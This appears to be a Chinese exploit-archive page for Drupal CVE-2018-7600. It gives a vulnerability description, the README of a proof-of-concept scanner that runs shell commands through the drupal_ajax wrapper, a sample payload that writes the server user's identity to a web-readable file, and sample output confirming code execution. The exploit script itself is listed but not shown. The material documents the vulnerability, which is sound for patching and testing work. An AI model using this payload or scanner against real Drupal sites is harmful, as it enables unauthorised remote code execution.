关联漏洞
标题:
Drupal 安全漏洞
(CVE-2018-7600)
描述:Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal 7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。
描述
Proof-of-Concept for Drupal CVE-2018-7600 / SA-CORE-2018-002
介绍
# Proof-Of-Concept for [CVE-2018-7600 / SA-CORE-2018-002](https://cve.circl.lu/cve/CVE-2018-7600) [](https://codebeat.co/projects/github-com-thehappydinoa-cve-2018-7600-main)
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
## How it works
1. It sends a packet to the `drupal_ajax` wrapper to register a user. Allows user to use the `exec` markup and run bash. This PoC sends a the user name and id to abcde.txt.
```bash
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
```
2. Checks `http*://example.com/abcde.txt`
```bash
[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text
```
## Payloads
%s = file name
User ID, PID, and Group Payload
```bash
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s
```
## Thanks to
- Thanks to [Vitalii Rudnykh](https://github.com/a2u)
## Provided only for educational or information purposes.
文件快照
[4.0K] /data/pocs/1603107e2cc126160ee68195a47f64fd6c878bff
├── [5.7K] exploiter.py
├── [ 20] hosts.txt
├── [1.0K] LICENSE
├── [ 180] notes.md
├── [1.4K] README.md
├── [ 17] requirements.txt
└── [ 60] todo.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。